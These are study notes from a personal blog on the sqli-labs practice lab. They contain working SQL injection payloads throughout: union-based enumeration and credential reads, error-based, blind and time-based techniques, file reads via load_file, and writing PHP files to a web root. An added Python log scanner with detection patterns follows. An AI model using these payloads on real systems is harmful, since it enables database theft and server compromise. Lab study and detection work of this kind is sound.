sqli-labs study notes
2020.11.02
le31ei
Pentest
less-1 ~ less-4: basic injection
Basic injection: the result of the database query is echoed directly in the page, so the usual approach works.
The injection statements used:
```text
# Find the number of columns
http://192.168.100.51/sql/Less-1/?id=1%27+order+by+3--+
# Find which column positions are echoed; a union query only shows the second half when the first half returns no rows, so id must be -1
http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,2,3--+
# Enumerate databases
http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,group_concat(schema_name),3+from+information_schema.schemata--+
# Enumerate tables
http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=%27security%27--+
# Enumerate columns
http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=%27users%27--+
# Read data
http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,group_concat(username,password),3+from+users+where+id=1--+
```
Less-1: string-type injection
```text
http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,group_concat(username,password),3+from+users+where+id=1--+
```
Less-2: numeric-type injection
```text
http://192.168.100.51/sql/Less-2/?id=-1+union+select+1,group_concat(username,password),3+from+users+where+id=1--+
```
Less-3
```text
http://192.168.100.51/sql/Less-3/?id=-1%27)+union+select+1,group_concat(username,password),3+from+users+where+id=1--+
```
Less-4
```text
http://192.168.100.51/sql/Less-4/?id=1%22)+and+1=2+union+select+1,group_concat(username,password),3+from+users+where+id=1--+
```
less-5 ~ less-6: blind injection
Functions commonly used in blind injection:
```sql
# left(a,b): take the first b characters of a
left(user(),1)
# substr(a,b,c): starting at position b, take c characters of a
substr(a,b,c)
# ascii(): convert a character to its ASCII code
ascii('a')
# mid(a,b,c): starting at position b, take c characters of a (same as substr)
mid(a,b,c)
# ord(): same as ascii(), convert a character to its ASCII code value
ord('a')
ascii(substr((select user()),1,1))=98
# if(a,b,c): if a is true return b, otherwise return c
if((user() regexp '^ro'), 0, 1)
```
regexp (regular-expression) injection
Usage:
Returns true when the pattern matches, otherwise false.
```sql
select user() regexp '^ro'
```
This checks whether the query result is root: true when it matches, false otherwise.
Injection statement: `select * from users where id=1 and 1=(user() regexp '^ro')`
like (pattern-match) injection
Usage:
Returns true when the query finds a match, otherwise false.
```sql
select user() like 'ro%'
```
Injection statement:
`select * from users where id=1 and 1=(user() like 'ro%')`
Error-based injection
```sql
# floor() error
Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+
# xpath injection
extractvalue(1,concat(0x7e,(select%20user()),0x7e))%20--+
updatexml(1,concat(0x7e,(select%20@@version),0x7e),1)%20--+
# bigint overflow
union select (!(select * from (select user())x) - ~0),2,3--+
# double: numeric value out of range
union select (exp(~(select * FROM(SELECT USER())))),2,3--+
# duplicate data
union%20select%201,2,3%20from%20(select%20NAME_CONST(version(),1),%20NAME_CONST(version(),1))x%20--+
```
Time-based injection
```sql
# sleep-based delay
If(ascii(substr(database(),1,1))=116,1,sleep(3))--+
# benchmark-based delay
If(ascii(substr(database(),1,1))=116,1,BENCHMARK(50000000,ENCODE(%27MSG%27,%27by%205%20seconds%27)))--+
```
less-7: export
Reading files with load_file()
load_file(file_name)
**Conditions for use:**
- You must have the privilege and the file must be readable; this can be checked with `and (select count(*) from mysql.user)>0`: if the page returns normally, you have read/write privileges.
- The absolute path of the file must be given.
- The file must be smaller than `max_allowed_packet`.
Common usage:
```sql
1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
# Explanation: "char(99,58,47,98,111,111,116,46,105,110,105)" is the ASCII code of "c:/boot.ini"
-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
# Explanation: the hex encoding of "c:/boot.ini" is "0x633a2f626f6f742e696e69"
-1 union select 1,1,1,load_file('c:\\boot.ini')
# Explanation: the / in the path is replaced by \\
```
Writing files with select into outfile
- Write a file directly
```sql
Select version() into outfile "c:\\phpnow\\htdocs\\test.php"
```
- Append to the end of a file
```sql
Select version() Into outfile "c:\\phpnow\\htdocs\\test.php" LINES TERMINATED BY 0x<hex-encoded file content>
```
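From the defender's side, the payload families in these notes (union, information_schema enumeration, error-based functions, sleep/benchmark delays, load_file/into outfile) all leave distinctive keywords in the web server access log. The following is an added example, not from the original notes or from sqli-labs: a small detector that URL-decodes each request and tags it by family. The Apache-style log format and the log lines themselves are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# One rule per payload family used in these notes; the keywords are exactly
# the ones the payloads above rely on.
RULES = {
    "union": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\."),
    "error_based": re.compile(r"\b(?:extractvalue|updatexml|name_const)\s*\("
                              r"|\bfloor\s*\(\s*rand\s*\("),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "file_io": re.compile(r"\bload_file\s*\(|\binto\s+outfile\b"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed Apache-style access-log lines (assumed format, not from the
# page); the query strings replay the shapes of the payloads shown above.
SAMPLE_LOG = """\
192.168.100.7 - - [02/Nov/2020:10:01:01 +0800] "GET /sql/Less-1/?id=1 HTTP/1.1" 200 1234
192.168.100.7 - - [02/Nov/2020:10:01:05 +0800] "GET /sql/Less-1/?id=-1%27+union+select+1,group_concat(schema_name),3+from+information_schema.schemata--+ HTTP/1.1" 200 2048
192.168.100.7 - - [02/Nov/2020:10:02:10 +0800] "GET /sql/Less-5/?id=1%27+and+extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+ HTTP/1.1" 500 612
192.168.100.7 - - [02/Nov/2020:10:03:30 +0800] "GET /sql/Less-5/?id=1%27+and+If(ascii(substr(database(),1,1))=116,1,sleep(3))--+ HTTP/1.1" 200 1234
192.168.100.7 - - [02/Nov/2020:10:04:00 +0800] "GET /sql/Less-7/?id=-1%27))+union+select+1,1,1,load_file(0x633a2f626f6f742e696e69)--+ HTTP/1.1" 200 1234
"""


def classify(raw_query):
    """Return the rule names that fire on one URL-encoded query string.

    The query is decoded and lower-cased first: the payloads above arrive as
    %27/%20/+ and mix cases such as Select, If and BENCHMARK."""
    q = re.sub(r"\s+", " ", unquote_plus(raw_query).lower())
    return [name for name, rx in RULES.items() if rx.search(q)]


def scan_log(log_text):
    """Return (request path, rule names) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and (tags := classify(m.group(1))):
            hits.append((m.group(1).split("?", 1)[0], tags))
    return hits


if __name__ == "__main__":
    for path, tags in scan_log(SAMPLE_LOG):
        print(path, ",".join(tags))
```

Matching after decoding matters: the raw log line contains `%27` and `+`, not the quote and spaces the database sees, and a rule written against the encoded form misses any variant encoding.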
References
1. 《mysql注入天书》